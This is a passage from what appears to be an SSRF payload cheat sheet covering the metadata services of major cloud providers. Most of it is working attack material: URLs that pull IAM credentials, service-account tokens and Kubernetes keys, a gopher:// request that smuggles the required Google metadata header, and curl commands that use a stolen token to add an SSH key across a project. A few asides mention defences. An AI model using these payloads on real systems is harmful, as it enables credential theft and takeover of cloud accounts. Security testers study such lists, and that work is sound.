<div class="highlight"><pre><span></span><code><a id="__codelineno-44-1" name="__codelineno-44-1" href="#__codelineno-44-1"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">iam</span><span class="p">/</span><span class="n">security-credentials</span>
<a id="__codelineno-44-2" name="__codelineno-44-2" href="#__codelineno-44-2"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">iam</span><span class="p">/</span><span class="n">security-credentials</span><span class="p">/</span><span class="no">[ROLE NAME]</span>
<a id="__codelineno-44-3" name="__codelineno-44-3" href="#__codelineno-44-3"></a>
<a id="__codelineno-44-4" name="__codelineno-44-4" href="#__codelineno-44-4"></a><span class="c"># Examples</span>
<a id="__codelineno-44-5" name="__codelineno-44-5" href="#__codelineno-44-5"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">iam</span><span class="p">/</span><span class="n">security-credentials</span><span class="p">/</span><span class="n">PhotonInstance</span>
<a id="__codelineno-44-6" name="__codelineno-44-6" href="#__codelineno-44-6"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">iam</span><span class="p">/</span><span class="n">security-credentials</span><span class="p">/</span><span class="n">dummy</span>
<a id="__codelineno-44-7" name="__codelineno-44-7" href="#__codelineno-44-7"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">iam</span><span class="p">/</span><span class="n">security-credentials</span><span class="p">/</span><span class="n">s3access</span>
</code></pre></div></p>
<p>This URL is used to access the user data that was specified when launching the instance. User data is often used to pass startup scripts or other configuration information into the instance.
<div class="highlight"><pre><span></span><code><a id="__codelineno-45-1" name="__codelineno-45-1" href="#__codelineno-45-1"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">user-data</span>
</code></pre></div></p>
<p>Other URLs to query to access various pieces of metadata about the instance, like the hostname, public IPv4 address, and other properties.
<div class="highlight"><pre><span></span><code><a id="__codelineno-46-1" name="__codelineno-46-1" href="#__codelineno-46-1"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span>
<a id="__codelineno-46-2" name="__codelineno-46-2" href="#__codelineno-46-2"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">ami-id</span>
<a id="__codelineno-46-3" name="__codelineno-46-3" href="#__codelineno-46-3"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">reservation-id</span>
<a id="__codelineno-46-4" name="__codelineno-46-4" href="#__codelineno-46-4"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">hostname</span>
<a id="__codelineno-46-5" name="__codelineno-46-5" href="#__codelineno-46-5"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">public-keys</span><span class="p">/</span>
<a id="__codelineno-46-6" name="__codelineno-46-6" href="#__codelineno-46-6"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">public-keys</span><span class="p">/</span><span class="n">0</span><span class="p">/</span><span class="n">openssh-key</span>
<a id="__codelineno-46-7" name="__codelineno-46-7" href="#__codelineno-46-7"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">public-keys</span><span class="p">/</span><span class="no">[ID]</span><span class="p">/</span><span class="n">openssh-key</span>
<a id="__codelineno-46-8" name="__codelineno-46-8" href="#__codelineno-46-8"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">dynamic</span><span class="p">/</span><span class="n">instance-identity</span><span class="p">/</span><span class="n">document</span>
</code></pre></div></p>
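<p>E.g: Jira SSRF leading to AWS info disclosure - <code>https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1/maintenance</code>. Note that the path in this example, <code>/metadata/v1/maintenance</code>, does not follow the AWS <code>/latest/...</code> layout listed above, so it may belong to a different provider's metadata service.</p>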
<p>E.g2: Flaws challenge - <code>http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/</code></p>
<h3 id="ssrf-url-for-aws-ecs">SSRF URL for AWS ECS</h3>
<p>If you have an SSRF with file system access on an ECS instance, try extracting <code>/proc/self/environ</code> to get the UUID.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-47-1" name="__codelineno-47-1" href="#__codelineno-47-1"></a><span class="nb">curl </span><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">170</span><span class="p">.</span><span class="n">2</span><span class="p">/</span><span class="n">v2</span><span class="p">/</span><span class="n">credentials</span><span class="p">/&lt;</span><span class="n">UUID</span><span class="p">&gt;</span>
</code></pre></div>
<p>This way you'll extract the IAM keys of the attached role, so the impact is bounded by the permissions that role has been granted.</p>
<h3 id="ssrf-url-for-aws-elastic-beanstalk">SSRF URL for AWS Elastic Beanstalk</h3>
<p>We retrieve the <code>accountId</code> and <code>region</code> from the API.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-48-1" name="__codelineno-48-1" href="#__codelineno-48-1"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">dynamic</span><span class="p">/</span><span class="n">instance-identity</span><span class="p">/</span><span class="n">document</span>
<a id="__codelineno-48-2" name="__codelineno-48-2" href="#__codelineno-48-2"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">iam</span><span class="p">/</span><span class="n">security-credentials</span><span class="p">/</span><span class="n">aws-elasticbeanorastalk-ec2-role</span>
</code></pre></div>
<p>We then retrieve the <code>AccessKeyId</code>, <code>SecretAccessKey</code>, and <code>Token</code> from the API.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-49-1" name="__codelineno-49-1" href="#__codelineno-49-1"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">iam</span><span class="p">/</span><span class="n">security-credentials</span><span class="p">/</span><span class="n">aws-elasticbeanorastalk-ec2-role</span>
</code></pre></div>
<p><img alt="notsosecureblog-awskey" src="https://www.notsosecure.com/wp-content/uploads/2019/02/aws-cli.jpg" /></p>
<p>Then we use the credentials with <code>aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/</code>.</p>
<h3 id="ssrf-url-for-aws-lambda">SSRF URL for AWS Lambda</h3>
<p>AWS Lambda provides an HTTP API for custom runtimes to receive invocation events from Lambda and send response data back within the Lambda execution environment.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-50-1" name="__codelineno-50-1" href="#__codelineno-50-1"></a><span class="n">http</span><span class="p">://</span><span class="n">localhost</span><span class="p">:</span><span class="n">9001</span><span class="p">/</span><span class="n">2018</span><span class="p">-</span><span class="n">06</span><span class="p">-</span><span class="n">01</span><span class="p">/</span><span class="n">runtime</span><span class="p">/</span><span class="n">invocation</span><span class="p">/</span><span class="n">next</span>
<a id="__codelineno-50-2" name="__codelineno-50-2" href="#__codelineno-50-2"></a><span class="p">$</span> <span class="nb">curl </span><span class="s2">&quot;http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next&quot;</span>
</code></pre></div>
<p>Docs: https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html#runtimes-api-next</p>
<h3 id="ssrf-url-for-google-cloud">SSRF URL for Google Cloud</h3>
<p><img alt="⚠" class="twemoji" src="https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/svg/26a0.svg" title=":warning:" /> Google is shutting down support for usage of the <strong>v1 metadata service</strong> on January 15.</p>
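<p>Requires the header <code>Metadata-Flavor: Google</code> or <code>X-Google-Metadata-Request: True</code>. A request without it is rejected, which is what stops an SSRF that controls only the URL from reading these endpoints.</p>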
<div class="highlight"><pre><span></span><code><a id="__codelineno-51-1" name="__codelineno-51-1" href="#__codelineno-51-1"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">computeMetadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span>
<a id="__codelineno-51-2" name="__codelineno-51-2" href="#__codelineno-51-2"></a><span class="n">http</span><span class="p">://</span><span class="n">metadata</span><span class="p">.</span><span class="n">google</span><span class="p">.</span><span class="n">internal</span><span class="p">/</span><span class="n">computeMetadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span>
<a id="__codelineno-51-3" name="__codelineno-51-3" href="#__codelineno-51-3"></a><span class="n">http</span><span class="p">://</span><span class="n">metadata</span><span class="p">/</span><span class="n">computeMetadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span>
<a id="__codelineno-51-4" name="__codelineno-51-4" href="#__codelineno-51-4"></a><span class="n">http</span><span class="p">://</span><span class="n">metadata</span><span class="p">.</span><span class="n">google</span><span class="p">.</span><span class="n">internal</span><span class="p">/</span><span class="n">computeMetadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">instance</span><span class="p">/</span><span class="n">hostname</span>
<a id="__codelineno-51-5" name="__codelineno-51-5" href="#__codelineno-51-5"></a><span class="n">http</span><span class="p">://</span><span class="n">metadata</span><span class="p">.</span><span class="n">google</span><span class="p">.</span><span class="n">internal</span><span class="p">/</span><span class="n">computeMetadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">instance</span><span class="p">/</span><span class="n">id</span>
<a id="__codelineno-51-6" name="__codelineno-51-6" href="#__codelineno-51-6"></a><span class="n">http</span><span class="p">://</span><span class="n">metadata</span><span class="p">.</span><span class="n">google</span><span class="p">.</span><span class="n">internal</span><span class="p">/</span><span class="n">computeMetadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">project</span><span class="p">/</span><span class="n">project-id</span>
</code></pre></div>
<p>Google allows recursive pulls</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-52-1" name="__codelineno-52-1" href="#__codelineno-52-1"></a><span class="n">http</span><span class="p">://</span><span class="n">metadata</span><span class="p">.</span><span class="n">google</span><span class="p">.</span><span class="n">internal</span><span class="p">/</span><span class="n">computeMetadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">instance</span><span class="p">/</span><span class="n">disks</span><span class="p">/</span><span class="k">?</span><span class="n">recursive</span><span class="p">=</span><span class="n">true</span>
</code></pre></div>
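<p>The <code>v1beta1</code> endpoint did NOT require the <code>Metadata-Flavor</code> header at the time of writing (thanks Mathias Karlsson @avlidienbrunn). Google has since deprecated the pre-<code>v1</code> endpoints, so on a current instance verify that only <code>v1</code>, which enforces the header, still answers.</p>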
<div class="highlight"><pre><span></span><code><a id="__codelineno-53-1" name="__codelineno-53-1" href="#__codelineno-53-1"></a><span class="n">http</span><span class="p">://</span><span class="n">metadata</span><span class="p">.</span><span class="n">google</span><span class="p">.</span><span class="n">internal</span><span class="p">/</span><span class="n">computeMetadata</span><span class="p">/</span><span class="n">v1beta1</span><span class="p">/</span>
<a id="__codelineno-53-2" name="__codelineno-53-2" href="#__codelineno-53-2"></a><span class="n">http</span><span class="p">://</span><span class="n">metadata</span><span class="p">.</span><span class="n">google</span><span class="p">.</span><span class="n">internal</span><span class="p">/</span><span class="n">computeMetadata</span><span class="p">/</span><span class="n">v1beta1</span><span class="p">/</span><span class="k">?</span><span class="n">recursive</span><span class="p">=</span><span class="n">true</span>
</code></pre></div>
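<p>The required header can still be supplied when the vulnerable fetcher accepts <code>gopher://</code> URLs, using the following technique. The header check is therefore not a complete defence on its own; the fetcher should also be restricted to the <code>http</code> and <code>https</code> schemes.</p>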
<div class="highlight"><pre><span></span><code><a id="__codelineno-54-1" name="__codelineno-54-1" href="#__codelineno-54-1"></a><span class="n">gopher</span><span class="p">://</span><span class="n">metadata</span><span class="p">.</span><span class="n">google</span><span class="p">.</span><span class="n">internal</span><span class="p">:</span><span class="n">80</span><span class="p">/</span><span class="n">xGET</span><span class="k">%</span><span class="n">20</span><span class="p">/</span><span class="n">computeMetadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">instance</span><span class="p">/</span><span class="n">attributes</span><span class="p">/</span><span class="n">ssh-keys</span><span class="k">%</span><span class="n">20HTTP</span><span class="k">%</span><span class="n">2f</span><span class="k">%</span><span class="n">31</span><span class="k">%</span><span class="n">2e</span><span class="k">%</span><span class="n">31</span><span class="k">%</span><span class="n">0AHost</span><span class="p">:</span><span class="k">%</span><span class="n">20metadata</span><span class="p">.</span><span class="n">google</span><span class="p">.</span><span class="n">internal</span><span class="k">%</span><span class="n">0AAccept</span><span class="p">:</span><span class="k">%</span><span class="n">20</span><span class="k">%</span><span class="n">2a</span><span class="k">%</span><span class="n">2f</span><span class="k">%</span><span class="n">2a</span><span class="k">%</span><span class="n">0aMetadata-Flavor</span><span class="p">:</span><span class="k">%</span><span class="n">20Google</span><span class="k">%</span><span class="n">0d</span><span class="k">%</span><span class="n">0a</span>
</code></pre></div>
<p>Interesting files to pull out:</p>
<ul>
<li>SSH Public Key : <code>http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json</code></li>
<li>Get Access Token : <code>http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token</code></li>
<li>Kubernetes Key : <code>http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json</code></li>
</ul>
<h4 id="add-an-ssh-key">Add an SSH key</h4>
<p>Extract the token</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-55-1" name="__codelineno-55-1" href="#__codelineno-55-1"></a><span class="n">http</span><span class="p">://</span><span class="n">metadata</span><span class="p">.</span><span class="n">google</span><span class="p">.</span><span class="n">internal</span><span class="p">/</span><span class="n">computeMetadata</span><span class="p">/</span><span class="n">v1beta1</span><span class="p">/</span><span class="n">instance</span><span class="p">/</span><span class="n">service-accounts</span><span class="p">/</span><span class="k">default</span><span class="p">/</span><span class="n">token</span><span class="k">?</span><span class="n">alt</span><span class="p">=</span><span class="n">json</span>
</code></pre></div>
<p>Check the scope of the token</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-56-1" name="__codelineno-56-1" href="#__codelineno-56-1"></a><span class="p">$</span> <span class="nb">curl </span><span class="n">https</span><span class="p">://</span><span class="n">www</span><span class="p">.</span><span class="n">googleapis</span><span class="p">.</span><span class="n">com</span><span class="p">/</span><span class="n">oauth2</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">tokeninfo</span><span class="k">?</span><span class="n">access_token</span><span class="p">=</span><span class="n">ya29</span><span class="p">.</span><span class="n">XXXXXKuXXXXXXXkGT0rJSA</span>
<a id="__codelineno-56-2" name="__codelineno-56-2" href="#__codelineno-56-2"></a>
<a id="__codelineno-56-3" name="__codelineno-56-3" href="#__codelineno-56-3"></a><span class="p">{</span>
<a id="__codelineno-56-4" name="__codelineno-56-4" href="#__codelineno-56-4"></a> <span class="s2">&quot;issued_to&quot;</span><span class="p">:</span> <span class="s2">&quot;101302079XXXXX&quot;</span><span class="p">,</span>
<a id="__codelineno-56-5" name="__codelineno-56-5" href="#__codelineno-56-5"></a> <span class="s2">&quot;audience&quot;</span><span class="p">:</span> <span class="s2">&quot;10130207XXXXX&quot;</span><span class="p">,</span>
<a id="__codelineno-56-6" name="__codelineno-56-6" href="#__codelineno-56-6"></a> <span class="s2">&quot;scope&quot;</span><span class="p">:</span> <span class="s2">&quot;https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/devstorage.read_write https://www.googleapis.com/auth/monitoring&quot;</span><span class="p">,</span>
<a id="__codelineno-56-7" name="__codelineno-56-7" href="#__codelineno-56-7"></a> <span class="s2">&quot;expires_in&quot;</span><span class="p">:</span> <span class="n">2443</span><span class="p">,</span>
<a id="__codelineno-56-8" name="__codelineno-56-8" href="#__codelineno-56-8"></a> <span class="s2">&quot;access_type&quot;</span><span class="p">:</span> <span class="s2">&quot;offline&quot;</span>
<a id="__codelineno-56-9" name="__codelineno-56-9" href="#__codelineno-56-9"></a><span class="p">}</span>
</code></pre></div>
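<p>Now push the SSH key. This call works only because the token's scope list above includes <code>https://www.googleapis.com/auth/compute</code>; attaching a service account with narrower scopes to the instance removes this path.</p>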
<div class="highlight"><pre><span></span><code><a id="__codelineno-57-1" name="__codelineno-57-1" href="#__codelineno-57-1"></a><span class="nb">curl </span><span class="n">-X</span> <span class="n">POST</span> <span class="s2">&quot;https://www.googleapis.com/compute/v1/projects/1042377752888/setCommonInstanceMetadata&quot;</span>
<a id="__codelineno-57-2" name="__codelineno-57-2" href="#__codelineno-57-2"></a><span class="n">-H</span> <span class="s2">&quot;Authorization: Bearer ya29.c.EmKeBq9XI09_1HK1XXXXXXXXT0rJSA&quot;</span>
<a id="__codelineno-57-3" name="__codelineno-57-3" href="#__codelineno-57-3"></a><span class="n">-H</span> <span class="s2">&quot;Content-Type: application/json&quot;</span>
<a id="__codelineno-57-4" name="__codelineno-57-4" href="#__codelineno-57-4"></a><span class="p">-</span><span class="n">-data</span> <span class="s1">&#39;{&quot;items&quot;: [{&quot;key&quot;: &quot;sshkeyname&quot;, &quot;value&quot;: &quot;sshkeyvalue&quot;}]}&#39;</span>
</code></pre></div>
<h3 id="ssrf-url-for-digital-ocean">SSRF URL for Digital Ocean</h3>
<p>Documentation available at <code>https://developers.digitalocean.com/documentation/metadata/</code></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-58-1" name="__codelineno-58-1" href="#__codelineno-58-1"></a><span class="nb">curl </span><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">id</span>
<a id="__codelineno-58-2" name="__codelineno-58-2" href="#__codelineno-58-2"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">v1</span><span class="p">.</span><span class="n">json</span>
<a id="__codelineno-58-3" name="__codelineno-58-3" href="#__codelineno-58-3"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span>
<a id="__codelineno-58-4" name="__codelineno-58-4" href="#__codelineno-58-4"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">id</span>
<a id="__codelineno-58-5" name="__codelineno-58-5" href="#__codelineno-58-5"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">user-data</span>
<a id="__codelineno-58-6" name="__codelineno-58-6" href="#__codelineno-58-6"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">hostname</span>
<a id="__codelineno-58-7" name="__codelineno-58-7" href="#__codelineno-58-7"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">region</span>
<a id="__codelineno-58-8" name="__codelineno-58-8" href="#__codelineno-58-8"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">interfaces</span><span class="p">/</span><span class="n">public</span><span class="p">/</span><span class="n">0</span><span class="p">/</span><span class="n">ipv6</span><span class="p">/</span><span class="n">address</span>
<a id="__codelineno-58-9" name="__codelineno-58-9" href="#__codelineno-58-9"></a>
<a id="__codelineno-58-10" name="__codelineno-58-10" href="#__codelineno-58-10"></a><span class="n">All</span> <span class="k">in</span> <span class="n">one</span> <span class="n">request</span><span class="p">:</span>
<a id="__codelineno-58-11" name="__codelineno-58-11" href="#__codelineno-58-11"></a><span class="nb">curl </span><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">v1</span><span class="p">.</span><span class="n">json</span> <span class="p">|</span> <span class="n">jq</span>
</code></pre></div>
<h3 id="ssrf-url-for-packetcloud">SSRF URL for Packetcloud</h3>
<p>Documentation available at <code>https://metadata.packet.net/userdata</code></p>
<h3 id="ssrf-url-for-azure">SSRF URL for Azure</h3>
<p>Coverage here is limited; more endpoints may exist. See <code>https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/</code></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-59-1" name="__codelineno-59-1" href="#__codelineno-59-1"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">maintenance</span>
</code></pre></div>
<p>Update (Apr 2017): Azure now exposes more metadata, and requests must carry the header <code>Metadata: true</code>. See <code>https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service</code></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-60-1" name="__codelineno-60-1" href="#__codelineno-60-1"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">instance</span><span class="k">?</span><span class="n">api-version</span><span class="p">=</span><span class="n">2017</span><span class="p">-</span><span class="n">04</span><span class="p">-</span><span class="n">02</span>
<a id="__codelineno-60-2" name="__codelineno-60-2" href="#__codelineno-60-2"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">instance</span><span class="p">/</span><span class="n">network</span><span class="p">/</span><span class="n">interface</span><span class="p">/</span><span class="n">0</span><span class="p">/</span><span class="n">ipv4</span><span class="p">/</span><span class="n">ipAddress</span><span class="p">/</span><span class="n">0</span><span class="p">/</span><span class="n">publicIpAddress</span><span class="k">?</span><span class="n">api-version</span><span class="p">=</span><span class="n">2017</span><span class="p">-</span><span class="n">04</span><span class="p">-</span><span class="n">02</span><span class="p">&amp;</span><span class="n">format</span><span class="p">=</span><span class="n">text</span>
</code></pre></div>
<h3 id="ssrf-url-for-openstackrackspace">SSRF URL for OpenStack/RackSpace</h3>
<p>(It is unknown whether a request header is required.)</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-61-1" name="__codelineno-61-1" href="#__codelineno-61-1"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">openstack</span>
</code></pre></div>
<h3 id="ssrf-url-for-hp-helion">SSRF URL for HP Helion</h3>
<p>(It is unknown whether a request header is required.)</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-62-1" name="__codelineno-62-1" href="#__codelineno-62-1"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">2009</span><span class="p">-</span><span class="n">04</span><span class="p">-</span><span class="n">04</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span>
</code></pre></div>
<h3 id="ssrf-url-for-oracle-cloud">SSRF URL for Oracle Cloud</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-63-1" name="__codelineno-63-1" href="#__codelineno-63-1"></a><span class="n">http</span><span class="p">://</span><span class="n">192</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">192</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span>
<a id="__codelineno-63-2" name="__codelineno-63-2" href="#__codelineno-63-2"></a><span class="n">http</span><span class="p">://</span><span class="n">192</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">192</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">user-data</span><span class="p">/</span>
<a id="__codelineno-63-3" name="__codelineno-63-3" href="#__codelineno-63-3"></a><span class="n">http</span><span class="p">://</span><span class="n">192</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">192</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span>
<a id="__codelineno-63-4" name="__codelineno-63-4" href="#__codelineno-63-4"></a><span class="n">http</span><span class="p">://</span><span class="n">192</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">192</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">attributes</span><span class="p">/</span>
</code></pre></div>
<h3 id="ssrf-url-for-alibaba">SSRF URL for Alibaba</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-64-1" name="__codelineno-64-1" href="#__codelineno-64-1"></a><span class="n">http</span><span class="p">://</span><span class="n">100</span><span class="p">.</span><span class="n">100</span><span class="p">.</span><span class="n">100</span><span class="p">.</span><span class="n">200</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span>
